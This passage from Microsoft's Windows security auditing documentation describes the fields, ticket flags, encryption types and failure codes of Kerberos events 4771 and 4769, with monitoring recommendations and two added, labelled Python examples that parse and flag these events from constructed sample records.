krbtgt/DOMAIN_FULL_NAME. Example: krbtgt/CONTOSO.LOCAL
Network Information:
Client Address [Type = UnicodeString]: IP address of the computer from which the TGT request was received. Formats vary, and include the following:
IPv6 or IPv4 address.
::ffff:IPv4_address.
::1 - localhost.
Client Port [Type = UnicodeString]: source port number of the client network connection (TGT request connection).
0 for local (localhost) requests.
Additional Information:
Ticket Options [Type = HexInt32]: this is a set of different Ticket Flags in hexadecimal format.
Example:
Ticket Options: 0x40810010
Binary view: 01000000100000010000000000010000
Using MSB 0 bit numbering we have bits 1, 8, 15 and 27 set = Forwardable, Renewable, Canonicalize, Renewable-ok.

Note In the table below “MSB 0” bit numbering is used, because RFC documents use this style. In “MSB 0” style, bit numbering begins from the left.

The most common values:
0x40810010 - Forwardable, Renewable, Canonicalize, Renewable-ok
0x40810000 - Forwardable, Renewable, Canonicalize
0x60810010 - Forwardable, Forwarded, Renewable, Canonicalize, Renewable-ok
BIT | FLAG NAME | DESCRIPTION
0 | Reserved | -
1 | Forwardable | (TGT only). Tells the ticket-granting service that it can issue a new TGT, based on the presented TGT, with a different network address based on the presented TGT.
2 | Forwarded | Indicates either that a TGT has been forwarded or that a ticket was issued from a forwarded TGT.
3 | Proxiable | (TGT only). Tells the ticket-granting service that it can issue tickets with a network address that differs from the one in the TGT.
4 | Proxy | Indicates that the network address in the ticket is different from the one in the TGT used to obtain the ticket.
5 | Allow-postdate | Postdated tickets SHOULD NOT be supported in KILE (Microsoft Kerberos Protocol Extension).
6 | Postdated | Postdated tickets SHOULD NOT be supported in KILE (Microsoft Kerberos Protocol Extension).
7 | Invalid | This flag indicates that a ticket is invalid, and it must be validated by the KDC before use. Application servers must reject tickets which have this flag set.
8 | Renewable | Used in combination with the End Time and Renew Till fields to cause tickets with long life spans to be renewed at the KDC periodically.
9 | Initial | Indicates that a ticket was issued using the authentication service (AS) exchange and not issued based on a TGT.
10 | Pre-authent | Indicates that the client was authenticated by the KDC before a ticket was issued. This flag usually indicates the presence of an authenticator in the ticket. It can also flag the presence of credentials taken from a smart card logon.
11 | Opt-hardware-auth | This flag was originally intended to indicate that hardware-supported authentication was used during pre-authentication. This flag is no longer recommended in the Kerberos V5 protocol. KDCs MUST NOT issue a ticket with this flag set. KDCs SHOULD NOT preserve this flag if it is set by another KDC.
12 | Transited-policy-checked | KILE MUST NOT check for transited domains on servers or a KDC. Application servers MUST ignore the TRANSITED-POLICY-CHECKED flag.
13 | Ok-as-delegate | The KDC MUST set the OK-AS-DELEGATE flag if the service account is trusted for delegation.
14 | Request-anonymous | KILE does not use this flag.
15 | Name-canonicalize | In order to request referrals the Kerberos client MUST explicitly request the "canonicalize" KDC option for the AS-REQ or TGS-REQ.
16-25 | Unused | -
26 | Disable-transited-check | By default the KDC will check the transited field of a TGT against the policy of the local realm before it will issue derivative tickets based on the TGT. If this flag is set in the request, checking of the transited field is disabled. Tickets issued without the performance of this check will be noted by the reset (0) value of the TRANSITED-POLICY-CHECKED flag, indicating to the application server that the transited field must be checked locally. KDCs are encouraged but not required to honor the DISABLE-TRANSITED-CHECK option. Should not be in use, because the Transited-policy-checked flag is not supported by KILE.
27 | Renewable-ok | The RENEWABLE-OK option indicates that a renewable ticket will be acceptable if a ticket with the requested life cannot otherwise be provided, in which case a renewable ticket may be issued with a renew-till equal to the requested end time. The value of the renew-till field may still be limited by local limits, or limits selected by the individual principal or server.
28 | Enc-tkt-in-skey | No information.
29 | Unused | -
30 | Renew | The RENEW option indicates that the present request is for a renewal. The ticket provided is encrypted in the secret key for the server on which it is valid. This option will only be honored if the ticket to be renewed has its RENEWABLE flag set and if the time in its renew-till field has not passed. The ticket to be renewed is passed in the padata field as part of the authentication header.
31 | Validate | This option is used only by the ticket-granting service. The VALIDATE option indicates that the request is to validate a postdated ticket. Should not be in use, because postdated tickets are not supported by KILE.

Table 6. Kerberos ticket flags.

Failure Code [Type = HexInt32]: hexadecimal failure code of the failed TGT issue operation. The table below contains the list of the most common error codes for this event:

CODE | CODE NAME | DESCRIPTION | POSSIBLE CAUSES
0x10 | KDC_ERR_PADATA_TYPE_NOSUPP | KDC has no support for PADATA type (pre-authentication data) | Smart card logon is being attempted and the proper certificate cannot be located. This can happen because the wrong certification authority (CA) is being queried or the proper CA cannot be contacted in order to get Domain Controller or Domain Controller Authentication certificates for the domain controller. It can also happen when a domain controller doesn’t have a certificate installed for smart cards (Domain Controller or Domain Controller Authentication templates).
0x17 | KDC_ERR_KEY_EXPIRED | Password has expired; change password to reset | The user’s password has expired.
0x18 | KDC_ERR_PREAUTH_FAILED | Pre-authentication information was invalid | The wrong password was provided.

Pre-Authentication Type [Type = UnicodeString]: the code of the pre-authentication type which was used in the TGT request.
Table 5. Kerberos Pre-Authentication types.

TYPE | TYPE NAME | DESCRIPTION
0 | - | Logon without Pre-Authentication.
2 | PA-ENC-TIMESTAMP | This is a normal type for standard password authentication.
11 | PA-ETYPE-INFO | The ETYPE-INFO pre-authentication type is sent by the KDC in a KRB-ERROR indicating a requirement for additional pre-authentication. It is usually used to notify a client of which key to use for the encryption of an encrypted timestamp for the purposes of sending a PA-ENC-TIMESTAMP pre-authentication value. This pre-authentication type has not been seen in a Microsoft Active Directory environment.
15 | PA-PK-AS-REP_OLD | Used for Smart Card logon authentication.
17 | PA-PK-AS-REP | This type should also be used for Smart Card authentication, but in certain Active Directory environments, it is never seen.
19 | PA-ETYPE-INFO2 | The ETYPE-INFO2 pre-authentication type is sent by the KDC in a KRB-ERROR indicating a requirement for additional pre-authentication. It is usually used to notify a client of which key to use for the encryption of an encrypted timestamp for the purposes of sending a PA-ENC-TIMESTAMP pre-authentication value. This pre-authentication type has not been seen in a Microsoft Active Directory environment.
20 | PA-SVR-REFERRAL-INFO | Used in KDC Referrals tickets.
138 | PA-ENCRYPTED-CHALLENGE | Logon using Kerberos Armoring (FAST). Supported starting from Windows Server 2012 domain controllers and Windows 8 clients.
- | - | This type shows in Audit Failure events.

Certificate Information:
Certificate Issuer Name [Type = UnicodeString]: the name of Certification Authority which issued
smart card certificate. Populated in Issued by field in certificate. Always empty for 4771 events.
Certificate Serial Number [Type = UnicodeString]: smart card certificate’s serial number. Can be found
in Serial number field in the certificate. Always empty for 4771 events.
Certificate Thumbprint [Type = UnicodeString]: smart card certificate’s thumbprint. Can be found in
Thumbprint field in the certificate. Always empty for 4771 events.

Security Monitoring Recommendations

For 4771(F): Kerberos pre-authentication failed.

TYPE OF MONITORING REQUIRED | RECOMMENDATION
High-value accounts: You might have high-value domain or local accounts for which you need to monitor each action. Examples of high-value accounts are database administrators, built-in local administrator account, domain administrators, service accounts, domain controller accounts and so on. | Monitor this event with the “Security ID” that corresponds to the high-value account or accounts.
Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use of an account outside of working hours. | When you monitor for anomalies or malicious actions, use the “Security ID” (with other information) to monitor how or when a particular account is being used.
Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should never be used. | Monitor this event with the “Security ID” that corresponds to the accounts that should never be used.
Account whitelist: You might have a specific whitelist of accounts that are the only ones allowed to perform actions corresponding to particular events. | If this event corresponds to a “whitelist-only” action, review the “Security ID” for accounts that are outside the whitelist.
Account naming conventions: Your organization might have specific naming conventions for account names. | Monitor “Subject\Account Name” for names that don’t comply with naming conventions.

You can track all 4771 events where the Client Address is not from your internal IP range or not from private IP ranges.
If you know that an Account Name should be used only from a known list of IP addresses, track all Client Address values for this Account Name in 4771 events. If the Client Address is not from the whitelist, generate the alert.
A Client Address of ::1 means local authentication. If you know the list of accounts which should log on to the domain controllers, then you need to monitor for all possible violations, where Client Address = ::1 and the Account Name is not allowed to log on to any domain controller.
All 4771 events with a Client Port field value > 0 and < 1024 should be examined, because a well-known port was used for an outbound connection.
Also monitor the fields shown in the following table, to discover the issues listed:

FIELD | ISSUE TO DISCOVER
Pre-Authentication Type | Value is not 15 when the account must use a smart card for authentication. For more information, see Table 5. Kerberos Pre-Authentication types.
Pre-Authentication Type | Value is not 2 when only standard password authentication is in use in the organization. For more information, see Table 5. Kerberos Pre-Authentication types.
Pre-Authentication Type | Value is not 138 when Kerberos Armoring is enabled for all Kerberos communications in the organization. For more information, see Table 5. Kerberos Pre-Authentication types.
Result Code | 0x10 (KDC has no support for PADATA type (pre-authentication data)). This error can help you to more quickly identify smart-card related problems with Kerberos authentication.
Result Code | 0x18 (Pre-authentication information was invalid), if you see, for example, N events in the last N minutes. This can be an indicator of a brute-force attack on the account password, especially for highly critical accounts.
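The monitoring rules above for 4771 (Client Address outside the internal ranges, ::1 logons by accounts not approved for domain controllers, well-known source ports, the Pre-Authentication Type policy, and bursts of failure code 0x18) implemented as detection logic; this is added example code, not part of the Microsoft documentation, and the account policies, thresholds and the sample records it runs over are constructed assumptions.

```python
"""Detection rules for event 4771 (Kerberos pre-authentication failed).

Added example, not part of the original Microsoft documentation. It applies the
monitoring recommendations above to constructed 4771 records; the policies,
thresholds and sample records are assumptions made for this example.
"""
import ipaddress
import xml.etree.ElementTree as ET
from collections import defaultdict
from datetime import datetime, timedelta

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def parse_4771(xml_text):
    """Extract the fields used below from one 4771 record in Event XML form."""
    root = ET.fromstring(xml_text)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    stamp = root.find("e:System/e:TimeCreated", NS).get("SystemTime")
    return {
        "time": datetime.strptime(stamp[:19], "%Y-%m-%dT%H:%M:%S"),
        "account": data["TargetUserName"],
        "status": int(data["Status"], 16),    # Failure Code, e.g. 0x18
        "preauth": int(data["PreAuthType"]),  # Pre-Authentication Type, e.g. 2 or 15
        "ip": data["IpAddress"],
        "port": int(data["IpPort"]),
    }


def client_ip(value):
    """Normalise the Client Address formats listed above: ::ffff:IPv4 becomes a
    plain IPv4 address; ::1 and native IPv4/IPv6 addresses pass through."""
    addr = ipaddress.ip_address(value)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        return addr.ipv4_mapped
    return addr


def analyse(events, preauth_policy, internal_nets, dc_logon_accounts,
            burst_threshold=3, window=timedelta(minutes=5)):
    """Return (account, finding) pairs for every rule that fires."""
    findings = []
    recent_0x18 = defaultdict(list)  # account -> times of recent 0x18 failures
    nets = [ipaddress.ip_network(n) for n in internal_nets]
    for ev in sorted(events, key=lambda e: e["time"]):
        acct = ev["account"]
        expected = preauth_policy.get(acct)
        if expected is not None and ev["preauth"] != expected:
            findings.append((acct, f"pre-auth type {ev['preauth']}, policy requires {expected}"))
        ip = client_ip(ev["ip"])
        if ip == ipaddress.ip_address("::1"):
            if acct not in dc_logon_accounts:
                findings.append((acct, "local logon on a domain controller by a non-approved account"))
        elif not any(ip in net for net in nets):
            findings.append((acct, f"client address {ip} is outside the internal ranges"))
        if 0 < ev["port"] < 1024:
            findings.append((acct, f"well-known source port {ev['port']} used for the request"))
        if ev["status"] == 0x10:
            findings.append((acct, "0x10 KDC_ERR_PADATA_TYPE_NOSUPP: check smart card and DC certificate"))
        if ev["status"] == 0x18:
            hist = recent_0x18[acct]
            hist.append(ev["time"])
            hist[:] = [t for t in hist if ev["time"] - t <= window]
            if len(hist) >= burst_threshold:
                findings.append((acct, f"{len(hist)} 0x18 failures within {window}: possible brute force"))
    return findings


def _record(stamp, account, status, preauth, ip, port):
    """Constructed 4771 record in the Event XML layout shown above (not a real log)."""
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        f'<System><EventID>4771</EventID><TimeCreated SystemTime="{stamp}Z" />'
        '<Computer>DC01.contoso.local</Computer></System><EventData>'
        f'<Data Name="TargetUserName">{account}</Data><Data Name="Status">{status}</Data>'
        f'<Data Name="PreAuthType">{preauth}</Data><Data Name="IpAddress">{ip}</Data>'
        f'<Data Name="IpPort">{port}</Data></EventData></Event>'
    )


# Constructed sample: three wrong-password failures for dadmin within a few minutes,
# one failure from a non-internal address, one local smart-card failure by an
# account not approved for DC logon, and one failure from a well-known source port.
SAMPLE_RECORDS = [
    _record("2015-08-07T18:10:21.000000000", "dadmin", "0x18", 2, "::ffff:10.0.0.12", 49254),
    _record("2015-08-07T18:11:05.000000000", "dadmin", "0x18", 2, "::ffff:10.0.0.12", 49260),
    _record("2015-08-07T18:12:40.000000000", "dadmin", "0x18", 2, "::ffff:10.0.0.12", 49271),
    _record("2015-08-07T18:13:00.000000000", "svc_backup", "0x17", 2, "::ffff:203.0.113.9", 51000),
    _record("2015-08-07T18:13:30.000000000", "jdoe", "0x10", 15, "::1", 0),
    _record("2015-08-07T18:14:00.000000000", "WIN81$", "0x18", 2, "10.0.0.30", 445),
]
# Assumed policy: dadmin and jdoe must use smart cards (type 15), svc_backup a password (type 2).
PREAUTH_POLICY = {"dadmin": 15, "jdoe": 15, "svc_backup": 2}
INTERNAL_NETS = ["10.0.0.0/8", "192.168.0.0/16"]
DC_LOGON_ACCOUNTS = {"dadmin"}


def run_sample():
    """Parse the constructed records and run every rule over them."""
    return analyse([parse_4771(r) for r in SAMPLE_RECORDS],
                   PREAUTH_POLICY, INTERNAL_NETS, DC_LOGON_ACCOUNTS)


if __name__ == "__main__":
    for account, finding in run_sample():
        print(f"{account}: {finding}")
```

Feeding real records exported from the Security log (the Event XML view) into parse_4771 works the same way; only the policy dictionaries need to reflect the organization.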
4772(F): A Kerberos authentication ticket request failed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
This event is currently not generated. It is a defined event, but it is never invoked by the operating system. The 4768 failure event is generated instead.
Subcategory: Audit Kerberos Authentication Service
Audit Kerberos Service Ticket Operations
4/5/2019

Applies to
Windows 10
Windows Server 2016
Audit Kerberos Service Ticket Operations determines whether the operating system generates security audit events for Kerberos service ticket requests.
Events are generated every time Kerberos is used to authenticate a user who wants to access a protected network resource. Kerberos service ticket operation audit events can be used to track user activity.
Event volume: Very High on Kerberos Key Distribution Center servers.
This subcategory contains events about issued TGSs and failed TGS requests.

COMPUTER TYPE | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS
Domain Controller | IF | Yes | Yes | Yes | Expected volume is very high on domain controllers. IF - We recommend Success auditing, because you will see all Kerberos Service Ticket requests (TGS requests), which are part of service use and access requests by specific accounts. Also, you can see the IP address from which this account requested TGS, when TGS was requested, which encryption type was used, and so on. For recommendations for using and analyzing the collected information, see the Security Monitoring Recommendations sections. We recommend Failure auditing, because you will see all failed requests and be able to investigate the reason for failure. You will also be able to detect Kerberos issues or possible attack attempts.
Member Server | No | No | No | No | This subcategory makes sense only on domain controllers.
Workstation | No | No | No | No | This subcategory makes sense only on domain controllers.

Events List:
4769(S, F): A Kerberos service ticket was requested.
4770(S): A Kerberos service ticket was renewed.
4773(F): A Kerberos service ticket request failed.
4769(S, F): A Kerberos service ticket was requested.
4/26/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Kerberos Service Ticket Operations
Event Description:
This event generates every time the Key Distribution Center gets a Kerberos Ticket Granting Service (TGS) ticket request.
This event generates only on domain controllers.
If the TGS issue fails then you will see a Failure event with the Failure Code field not equal to “0x0”.
You will typically see many Failure events with Failure Code “0x20”, which simply means that a TGS ticket has expired. These are informational messages and have little to no security relevance.

Note For recommendations, see Security Monitoring Recommendations for this event.
Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4769</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>14337</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-07T18:13:46.043256100Z" />
    <EventRecordID>166746</EventRecordID>
    <Correlation />
    <Execution ProcessID="520" ThreadID="1496" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="TargetUserName">dadmin@CONTOSO.LOCAL</Data>
    <Data Name="TargetDomainName">CONTOSO.LOCAL</Data>
    <Data Name="ServiceName">WIN2008R2$</Data>
    <Data Name="ServiceSid">S-1-5-21-3457937927-2839227994-823803824-2102</Data>
    <Data Name="TicketOptions">0x40810000</Data>
    <Data Name="TicketEncryptionType">0x12</Data>
    <Data Name="IpAddress">::ffff:10.0.0.12</Data>
    <Data Name="IpPort">49272</Data>
    <Data Name="Status">0x0</Data>
    <Data Name="LogonGuid">{F85C455E-C66E-205C-6B39-F6C60A7FE453}</Data>
    <Data Name="TransmittedServices">-</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Account Information:
Account Name [Type = UnicodeString]: the user name of the account that requested the ticket in User Principal Name (UPN) syntax. Computer account names end with the $ character in the user name part. This field typically has the following value format: user_account_name@FULL_DOMAIN_NAME.
User account example: dadmin@CONTOSO.LOCAL
Computer account example: WIN81$@CONTOSO.LOCAL

Note Although this field is in the UPN format, this is not the attribute value of "UserPrincipalName" of the user account. It is the "normalized" name or implicit UPN. It is built from the user SamAccountName and the Active Directory domain name.

This parameter in this event is optional and can be empty in some cases.
Account Domain [Type = UnicodeString]: the name of the Kerberos Realm that Account Name belongs to. This can appear in a variety of formats, including the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
This parameter in this event is optional and can be empty in some cases.
Logon GUID [Type = GUID]: a GUID that can help you correlate this event (on a domain controller) with other events (on the target computer for which the TGS was issued) that can contain the same Logon GUID. These events are “4624: An account was successfully logged on”, “4648(S): A logon was attempted using explicit credentials” and “4964(S): Special groups have been assigned to a new logon.”
This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-0000-000000000000}”.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify resources, activities or instances.

Service Information:
Service Name [Type = UnicodeString]: the name of the account or computer for which the TGS ticket was
requested.
This parameter in this event is optional and can be empty in some cases.
Service ID [Type = SID]: SID of the account or computer object for which the TGS ticket was requested. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
NULL SID – this value shows in Failure events.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Network Information:
Client Address [Type = UnicodeString]: IP address of the computer from which the TGS request was
received. Formats vary, and include the following:
IPv6 or IPv4 address.
::ffff:IPv4_address.
::1 - localhost.
Client Port [Type = UnicodeString]: source port number of client network connection (TGS request
connection).
0 for local (localhost) requests.
Additional information:
Ticket Options [Type = HexInt32]: this is a set of different Ticket Flags in hexadecimal format.
Example:
Ticket Options: 0x40810010
Binary view: 01000000100000010000000000010000
Using MSB 0 bit numbering we have bits 1, 8, 15 and 27 set = Forwardable, Renewable, Canonicalize, Renewable-ok.

Note In the table below “MSB 0” bit numbering is used, because RFC documents use this style. In “MSB 0” style, bit numbering begins from the left.

The most common values:
0x40810010 - Forwardable, Renewable, Canonicalize, Renewable-ok
0x40810000 - Forwardable, Renewable, Canonicalize
0x60810010 - Forwardable, Forwarded, Renewable, Canonicalize, Renewable-ok

BIT | FLAG NAME | DESCRIPTION
0 | Reserved | -
1 | Forwardable | (TGT only). Tells the ticket-granting service that it can issue a new TGT, based on the presented TGT, with a different network address based on the presented TGT.
2 | Forwarded | Indicates either that a TGT has been forwarded or that a ticket was issued from a forwarded TGT.
3 | Proxiable | (TGT only). Tells the ticket-granting service that it can issue tickets with a network address that differs from the one in the TGT.
4 | Proxy | Indicates that the network address in the ticket is different from the one in the TGT used to obtain the ticket.
5 | Allow-postdate | Postdated tickets SHOULD NOT be supported in KILE (Microsoft Kerberos Protocol Extension).
6 | Postdated | Postdated tickets SHOULD NOT be supported in KILE (Microsoft Kerberos Protocol Extension).
7 | Invalid | This flag indicates that a ticket is invalid, and it must be validated by the KDC before use. Application servers must reject tickets which have this flag set.
8 | Renewable | Used in combination with the End Time and Renew Till fields to cause tickets with long life spans to be renewed at the KDC periodically.
9 | Initial | Indicates that a ticket was issued using the authentication service (AS) exchange and not issued based on a TGT.
10 | Pre-authent | Indicates that the client was authenticated by the KDC before a ticket was issued. This flag usually indicates the presence of an authenticator in the ticket. It can also flag the presence of credentials taken from a smart card logon.
11 | Opt-hardware-auth | This flag was originally intended to indicate that hardware-supported authentication was used during pre-authentication. This flag is no longer recommended in the Kerberos V5 protocol. KDCs MUST NOT issue a ticket with this flag set. KDCs SHOULD NOT preserve this flag if it is set by another KDC.
12 | Transited-policy-checked | KILE MUST NOT check for transited domains on servers or a KDC. Application servers MUST ignore the TRANSITED-POLICY-CHECKED flag.
13 | Ok-as-delegate | The KDC MUST set the OK-AS-DELEGATE flag if the service account is trusted for delegation.
14 | Request-anonymous | KILE does not use this flag.
15 | Name-canonicalize | In order to request referrals the Kerberos client MUST explicitly request the “canonicalize” KDC option for the AS-REQ or TGS-REQ.
16-25 | Unused | -
26 | Disable-transited-check | By default the KDC will check the transited field of a TGT against the policy of the local realm before it will issue derivative tickets based on the TGT. If this flag is set in the request, checking of the transited field is disabled. Tickets issued without the performance of this check will be noted by the reset (0) value of the TRANSITED-POLICY-CHECKED flag, indicating to the application server that the transited field must be checked locally. KDCs are encouraged but not required to honor the DISABLE-TRANSITED-CHECK option. Should not be in use, because the Transited-policy-checked flag is not supported by KILE.
27 | Renewable-ok | The RENEWABLE-OK option indicates that a renewable ticket will be acceptable if a ticket with the requested life cannot otherwise be provided, in which case a renewable ticket may be issued with a renew-till equal to the requested end time. The value of the renew-till field may still be limited by local limits, or limits selected by the individual principal or server.
28 | Enc-tkt-in-skey | No information.
29 | Unused | -
30 | Renew | The RENEW option indicates that the present request is for a renewal. The ticket provided is encrypted in the secret key for the server on which it is valid. This option will only be honored if the ticket to be renewed has its RENEWABLE flag set and if the time in its renew-till field has not passed. The ticket to be renewed is passed in the padata field as part of the authentication header.
31 | Validate | This option is used only by the ticket-granting service. The VALIDATE option indicates that the request is to validate a postdated ticket. Should not be in use, because postdated tickets are not supported by KILE.

Ticket Encryption Type [Type = HexInt32]: the cryptographic suite that was used for the issued TGS.
Table 4. Kerberos encryption types.

TYPE | TYPE NAME | DESCRIPTION
0x1 | DES-CBC-CRC | Disabled by default starting from Windows 7 and Windows Server 2008 R2.
0x3 | DES-CBC-MD5 | Disabled by default starting from Windows 7 and Windows Server 2008 R2.
0x11 | AES128-CTS-HMAC-SHA1-96 | Supported starting from Windows Server 2008 and Windows Vista.
0x12 | AES256-CTS-HMAC-SHA1-96 | Supported starting from Windows Server 2008 and Windows Vista.
0x17 | RC4-HMAC | Default suite for operating systems before Windows Server 2008 and Windows Vista.
0x18 | RC4-HMAC-EXP | Default suite for operating systems before Windows Server 2008 and Windows Vista.
0xFFFFFFFF or 0xffffffff | - | This type shows in Audit Failure events.
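A decoder for the Ticket Options field described in both the 4771 and the 4769 sections above (MSB 0 bit numbering from the ticket flags table) and for the 4769 Ticket Encryption Type of Table 4, added here as example code that is not part of the Microsoft documentation; which flags it treats as unexpected in a KILE environment and which suites as legacy are the example's own assumptions drawn from the tables' remarks.

```python
"""Decoder for the Ticket Options and Ticket Encryption Type fields of 4768/4769/4771.

Added example; not part of the original Microsoft documentation. Flag names follow
the ticket flags table above (MSB 0 numbering) and suite names follow Table 4.
The flags treated as unexpected in KILE and the suites treated as legacy are
assumptions drawn from those tables' remarks.
"""

# Bit number (MSB 0: the leftmost bit is 0) -> flag name, from the ticket flags table.
TICKET_FLAGS = {
    1: "Forwardable", 2: "Forwarded", 3: "Proxiable", 4: "Proxy",
    5: "Allow-postdate", 6: "Postdated", 7: "Invalid", 8: "Renewable",
    9: "Initial", 10: "Pre-authent", 11: "Opt-hardware-auth",
    12: "Transited-policy-checked", 13: "Ok-as-delegate",
    14: "Request-anonymous", 15: "Name-canonicalize",
    26: "Disable-transited-check", 27: "Renewable-ok", 28: "Enc-tkt-in-skey",
    30: "Renew", 31: "Validate",
}

# Flags the table says are unsupported, not used, or MUST NOT be issued in KILE
# (assumption: a request carrying one of them is worth a closer look).
UNEXPECTED_IN_KILE = {"Allow-postdate", "Postdated", "Opt-hardware-auth",
                      "Request-anonymous", "Disable-transited-check", "Validate"}

# Table 4. Kerberos encryption types.
ENCRYPTION_TYPES = {
    0x1: "DES-CBC-CRC", 0x3: "DES-CBC-MD5",
    0x11: "AES128-CTS-HMAC-SHA1-96", 0x12: "AES256-CTS-HMAC-SHA1-96",
    0x17: "RC4-HMAC", 0x18: "RC4-HMAC-EXP",
    0xFFFFFFFF: "(Audit Failure event)",
}
# DES is disabled by default and RC4 was the pre-2008 default; both treated as legacy (assumption).
LEGACY_ENCRYPTION = {0x1, 0x3, 0x17, 0x18}


def binary_view(value):
    """32-character binary string, exactly as the 'Binary view' line above shows it."""
    return format(value & 0xFFFFFFFF, "032b")


def set_bits_msb0(value):
    """MSB 0 bit numbers that are set: bit n is character n of binary_view(value)."""
    return [n for n, ch in enumerate(binary_view(value)) if ch == "1"]


def decode_ticket_options(value):
    """Map a Ticket Options value to its flag names (reserved/unused bits appear as 'bit-N')."""
    return [TICKET_FLAGS.get(n, f"bit-{n}") for n in set_bits_msb0(value)]


def unexpected_ticket_flags(value):
    """Flags set in value that the tables above say should not occur in KILE."""
    return sorted(set(decode_ticket_options(value)) & UNEXPECTED_IN_KILE)


def describe_encryption_type(value):
    """Return (suite name, is_legacy) for a Ticket Encryption Type value."""
    return ENCRYPTION_TYPES.get(value, f"unknown (0x{value:X})"), value in LEGACY_ENCRYPTION


def describe_4769(ticket_options, encryption_type):
    """Summarise the two hex fields of a 4769 record (see the sample event above)."""
    suite, legacy = describe_encryption_type(encryption_type)
    return {
        "flags": decode_ticket_options(ticket_options),
        "unexpected_flags": unexpected_ticket_flags(ticket_options),
        "encryption": suite,
        "legacy_encryption": legacy,
    }


if __name__ == "__main__":
    # Values taken from the sample 4769 event above: TicketOptions 0x40810000, etype 0x12.
    print(describe_4769(0x40810000, 0x12))
```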

Failure Code [Type = HexInt32]: hexadecimal result code of the TGS issue operation. The table below contains the list of the most common error codes for this event:

CODE | CODE NAME | DESCRIPTION | POSSIBLE CAUSES
0x0 | KDC_ERR_NONE | No error | No errors were found.
0x1 | KDC_ERR_NAME_EXP | Client's entry in KDC database has expired | No information.
0x2 | KDC_ERR_SERVICE_EXP | Server's entry in KDC database has expired | No information.
0x3 | KDC_ERR_BAD_PVNO | Requested Kerberos version number not supported | No information.
0x4 | KDC_ERR_C_OLD_MAST_KVNO | Client's key encrypted in old master key | No information.
0x5 | KDC_ERR_S_OLD_MAST_KVNO | Server's key encrypted in old master key | No information.
0x6 | KDC_ERR_C_PRINCIPAL_UNKNOWN | Client not found in Kerberos database | The username doesn’t exist.
0x7 | KDC_ERR_S_PRINCIPAL_UNKNOWN | Server not found in Kerberos database | This error can occur if the domain controller cannot find the server’s name in Active Directory. This error is similar to KDC_ERR_C_PRINCIPAL_UNKNOWN except that it occurs when the server name cannot be found.
0x8 | KDC_ERR_PRINCIPAL_NOT_UNIQUE | Multiple principal entries in KDC database | This error occurs if duplicate principal names exist. Unique principal names are crucial for ensuring mutual authentication. Thus, duplicate principal names are strictly forbidden, even across multiple realms. Without unique principal names, the client has no way of ensuring that the server it is communicating with is the correct one.
0x9 | KDC_ERR_NULL_KEY | The client or server has a null key (master key) | No master key was found for client or server. Usually it means that the administrator should reset the password on the account.
0xA | KDC_ERR_CANNOT_POSTDATE | Ticket (TGT) not eligible for postdating | This error can occur if a client requests postdating of a Kerberos ticket. Postdating is the act of requesting that a ticket’s start time be set into the future. It also can occur if there is a time difference between the client and the KDC.
0xB | KDC_ERR_NEVER_VALID | Requested start time is later than end time | There is a time difference between the KDC and the client.
0xC | KDC_ERR_POLICY | Requested start time is later than end time | This error is usually the result of logon restrictions in place on a user’s account. For example workstation restriction, smart card authentication requirement or logon time restriction.
0xD | KDC_ERR_BADOPTION | KDC cannot accommodate requested option | Impending expiration of a TGT. The SPN to which the client is attempting to delegate credentials is not in its Allowed-to-delegate-to list.
0xE | KDC_ERR_ETYPE_NOTSUPP | KDC has no support for encryption type | In general, this error occurs when the KDC or a client receives a packet that it cannot decrypt.
0xF | KDC_ERR_SUMTYPE_NOSUPP | KDC has no support for checksum type | The KDC, server, or client receives a packet for which it does not have a key of the appropriate encryption type. The result is that the computer is unable to decrypt the ticket.
0x10 | KDC_ERR_PADATA_TYPE_NOSUPP | KDC has no support for PADATA type (pre-authentication data) | Smart card logon is being attempted and the proper certificate cannot be located. This can happen because the wrong certification authority (CA) is being queried or the proper CA cannot be contacted. It can also happen when a domain controller doesn’t have a certificate installed for smart cards (Domain Controller or Domain Controller Authentication templates). This error code cannot occur in event “4768. A Kerberos authentication ticket (TGT) was requested”. It occurs in “4771. Kerberos pre-authentication failed” event.
0x11 | KDC_ERR_TRTYPE_NO_SUPP | KDC has no support for transited type | No information.
0x12 | KDC_ERR_CLIENT_REVOKED | Client’s credentials have been revoked | This might be because of an explicit disabling or because of other restrictions in place on the account. For example: account disabled, expired, or locked out.
0x13 | KDC_ERR_SERVICE_REVOKED | Credentials for server have been revoked | No information.
0x14 | KDC_ERR_TGT_REVOKED | TGT has been revoked | Since the remote KDC may change its PKCROSS key while there are PKCROSS tickets still active, it SHOULD cache the old PKCROSS keys until the last issued PKCROSS ticket expires. Otherwise, the remote KDC
will respond to a client with
a KRB-ERROR message of
type
